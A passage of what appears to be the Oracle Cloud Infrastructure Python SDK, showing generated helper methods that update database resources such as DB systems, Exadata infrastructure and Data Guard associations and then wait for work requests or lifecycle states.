A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.update_backup_destination(backup_destination_id, update_backup_destination_details, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.data.id
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_backup_destination(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
**waiter_kwargs
)
result_to_return = waiter_result
return result_to_return
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def update_cloud_exadata_infrastructure_and_wait_for_work_request(self, cloud_exadata_infrastructure_id, update_cloud_exadata_infrastructure_details, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.update_cloud_exadata_infrastructure` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param str cloud_exadata_infrastructure_id: (required)
The cloud Exadata infrastructure `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param oci.database.models.UpdateCloudExadataInfrastructureDetails update_cloud_exadata_infrastructure_details: (required)
Request to update the properties of an cloud Exadata infrastructure resource.
:param list[str] work_request_states: (optional)
An array of work requests states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.update_cloud_exadata_infrastructure`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.update_cloud_exadata_infrastructure(cloud_exadata_infrastructure_id, update_cloud_exadata_infrastructure_details, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def update_cloud_exadata_infrastructure_and_wait_for_state(self, cloud_exadata_infrastructure_id, update_cloud_exadata_infrastructure_details, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.update_cloud_exadata_infrastructure` and waits for the :py:class:`~oci.database.models.CloudExadataInfrastructure` acted upon
to enter the given state(s).
:param str cloud_exadata_infrastructure_id: (required)
The cloud Exadata infrastructure `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param oci.database.models.UpdateCloudExadataInfrastructureDetails update_cloud_exadata_infrastructure_details: (required)
Request to update the properties of an cloud Exadata infrastructure resource.
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.database.models.CloudExadataInfrastructure.lifecycle_state`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.update_cloud_exadata_infrastructure`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.update_cloud_exadata_infrastructure(cloud_exadata_infrastructure_id, update_cloud_exadata_infrastructure_details, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.data.id
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_cloud_exadata_infrastructure(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
**waiter_kwargs
)
result_to_return = waiter_result
return result_to_return
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def update_cloud_vm_cluster_and_wait_for_work_request(self, cloud_vm_cluster_id, update_cloud_vm_cluster_details, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.update_cloud_vm_cluster` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param str cloud_vm_cluster_id: (required)
The cloud VM cluster `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param oci.database.models.UpdateCloudVmClusterDetails update_cloud_vm_cluster_details: (required)
Request to update the attributes of a cloud VM cluster.
:param list[str] work_request_states: (optional)
An array of work requests states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.update_cloud_vm_cluster`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.update_cloud_vm_cluster(cloud_vm_cluster_id, update_cloud_vm_cluster_details, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def update_cloud_vm_cluster_and_wait_for_state(self, cloud_vm_cluster_id, update_cloud_vm_cluster_details, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.update_cloud_vm_cluster` and waits for the :py:class:`~oci.database.models.CloudVmCluster` acted upon
to enter the given state(s).
:param str cloud_vm_cluster_id: (required)
The cloud VM cluster `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param oci.database.models.UpdateCloudVmClusterDetails update_cloud_vm_cluster_details: (required)
Request to update the attributes of a cloud VM cluster.
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.database.models.CloudVmCluster.lifecycle_state`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.update_cloud_vm_cluster`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.update_cloud_vm_cluster(cloud_vm_cluster_id, update_cloud_vm_cluster_details, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.data.id
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_cloud_vm_cluster(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
**waiter_kwargs
)
result_to_return = waiter_result
return result_to_return
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def update_cloud_vm_cluster_iorm_config_and_wait_for_work_request(self, cloud_vm_cluster_id, cloud_vm_cluster_iorm_config_update_details, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.update_cloud_vm_cluster_iorm_config` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param str cloud_vm_cluster_id: (required)
The cloud VM cluster `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param oci.database.models.ExadataIormConfigUpdateDetails cloud_vm_cluster_iorm_config_update_details: (required)
Request to perform database update.
:param list[str] work_request_states: (optional)
An array of work requests states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.update_cloud_vm_cluster_iorm_config`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.update_cloud_vm_cluster_iorm_config(cloud_vm_cluster_id, cloud_vm_cluster_iorm_config_update_details, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def update_data_guard_association_and_wait_for_work_request(self, database_id, data_guard_association_id, update_data_guard_association_details, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.update_data_guard_association` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param str database_id: (required)
The database `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param str data_guard_association_id: (required)
The Data Guard association's `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param oci.database.models.UpdateDataGuardAssociationDetails update_data_guard_association_details: (required)
A request to update Data Guard association of a database.
:param list[str] work_request_states: (optional)
An array of work requests states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.update_data_guard_association`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.update_data_guard_association(database_id, data_guard_association_id, update_data_guard_association_details, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def update_data_guard_association_and_wait_for_state(self, database_id, data_guard_association_id, update_data_guard_association_details, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.update_data_guard_association` and waits for the :py:class:`~oci.database.models.DataGuardAssociation` acted upon
to enter the given state(s).
:param str database_id: (required)
The database `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param str data_guard_association_id: (required)
The Data Guard association's `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param oci.database.models.UpdateDataGuardAssociationDetails update_data_guard_association_details: (required)
A request to update Data Guard association of a database.
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.database.models.DataGuardAssociation.lifecycle_state`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.update_data_guard_association`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.update_data_guard_association(database_id, data_guard_association_id, update_data_guard_association_details, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.data.id
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_data_guard_association(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
**waiter_kwargs
)
result_to_return = waiter_result
return result_to_return
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def update_database_and_wait_for_work_request(self, database_id, update_database_details, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.update_database` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param str database_id: (required)
The database `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param oci.database.models.UpdateDatabaseDetails update_database_details: (required)
Request to perform database update.
:param list[str] work_request_states: (optional)
An array of work requests states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.update_database`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.update_database(database_id, update_database_details, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def update_database_and_wait_for_state(self, database_id, update_database_details, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.update_database` and waits for the :py:class:`~oci.database.models.Database` acted upon
to enter the given state(s).
:param str database_id: (required)
The database `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param oci.database.models.UpdateDatabaseDetails update_database_details: (required)
Request to perform database update.
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.database.models.Database.lifecycle_state`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.update_database`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.update_database(database_id, update_database_details, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.data.id
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_database(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
**waiter_kwargs
)
result_to_return = waiter_result
return result_to_return
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def update_database_software_image_and_wait_for_state(self, database_software_image_id, update_database_software_image_details, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.update_database_software_image` and waits for the :py:class:`~oci.database.models.DatabaseSoftwareImage` acted upon
to enter the given state(s).
:param str database_software_image_id: (required)
The DB system `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param oci.database.models.UpdateDatabaseSoftwareImageDetails update_database_software_image_details: (required)
Request to update the properties of a DB system.
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.database.models.DatabaseSoftwareImage.lifecycle_state`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.update_database_software_image`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.update_database_software_image(database_software_image_id, update_database_software_image_details, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.data.id
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_database_software_image(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
**waiter_kwargs
)
result_to_return = waiter_result
return result_to_return
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def update_db_home_and_wait_for_work_request(self, db_home_id, update_db_home_details, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.update_db_home` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param str db_home_id: (required)
The Database Home `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param oci.database.models.UpdateDbHomeDetails update_db_home_details: (required)
Request to update the properties of a Database Home.
:param list[str] work_request_states: (optional)
An array of work requests states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.update_db_home`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.update_db_home(db_home_id, update_db_home_details, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def update_db_home_and_wait_for_state(self, db_home_id, update_db_home_details, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.update_db_home` and waits for the :py:class:`~oci.database.models.DbHome` acted upon
to enter the given state(s).
:param str db_home_id: (required)
The Database Home `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param oci.database.models.UpdateDbHomeDetails update_db_home_details: (required)
Request to update the properties of a Database Home.
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.database.models.DbHome.lifecycle_state`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.update_db_home`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.update_db_home(db_home_id, update_db_home_details, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.data.id
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_db_home(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
**waiter_kwargs
)
result_to_return = waiter_result
return result_to_return
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def update_db_system_and_wait_for_work_request(self, db_system_id, update_db_system_details, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.update_db_system` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param str db_system_id: (required)
The DB system `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param oci.database.models.UpdateDbSystemDetails update_db_system_details: (required)
Request to update the properties of a DB system.
:param list[str] work_request_states: (optional)
An array of work requests states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.update_db_system`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.update_db_system(db_system_id, update_db_system_details, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def update_db_system_and_wait_for_state(self, db_system_id, update_db_system_details, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.update_db_system` and waits for the :py:class:`~oci.database.models.DbSystem` acted upon
to enter the given state(s).
:param str db_system_id: (required)
The DB system `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param oci.database.models.UpdateDbSystemDetails update_db_system_details: (required)
Request to update the properties of a DB system.
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.database.models.DbSystem.lifecycle_state`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.update_db_system`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.update_db_system(db_system_id, update_db_system_details, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.data.id
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_db_system(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
**waiter_kwargs
)
result_to_return = waiter_result
return result_to_return
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def update_exadata_infrastructure_and_wait_for_work_request(self, exadata_infrastructure_id, update_exadata_infrastructure_details, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.update_exadata_infrastructure` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param str exadata_infrastructure_id: (required)
The Exadata infrastructure `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param oci.database.models.UpdateExadataInfrastructureDetails update_exadata_infrastructure_details: (required)
Request to update the properties of an Exadata Cloud@Customer infrastructure.
:param list[str] work_request_states: (optional)
An array of work requests states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.update_exadata_infrastructure`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.update_exadata_infrastructure(exadata_infrastructure_id, update_exadata_infrastructure_details, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def update_exadata_infrastructure_and_wait_for_state(self, exadata_infrastructure_id, update_exadata_infrastructure_details, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.update_exadata_infrastructure` and waits for the :py:class:`~oci.database.models.ExadataInfrastructure` acted upon
to enter the given state(s).
:param str exadata_infrastructure_id: (required)
The Exadata infrastructure `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param oci.database.models.UpdateExadataInfrastructureDetails update_exadata_infrastructure_details: (required)
Request to update the properties of an Exadata Cloud@Customer infrastructure.
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.database.models.ExadataInfrastructure.lifecycle_state`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.update_exadata_infrastructure`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.update_exadata_infrastructure(exadata_infrastructure_id, update_exadata_infrastructure_details, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.data.id
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_exadata_infrastructure(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
**waiter_kwargs
)
result_to_return = waiter_result
return result_to_return
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def update_exadata_iorm_config_and_wait_for_work_request(self, db_system_id, exadata_iorm_config_update_details, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.update_exadata_iorm_config` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param str db_system_id: (required)
The DB system `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param oci.database.models.ExadataIormConfigUpdateDetails exadata_iorm_config_update_details: (required)
Request to perform database update.
:param list[str] work_request_states: (optional)
An array of work requests states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.update_exadata_iorm_config`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.update_exadata_iorm_config(db_system_id, exadata_iorm_config_update_details, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def update_exadata_iorm_config_and_wait_for_state(self, db_system_id, exadata_iorm_config_update_details, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
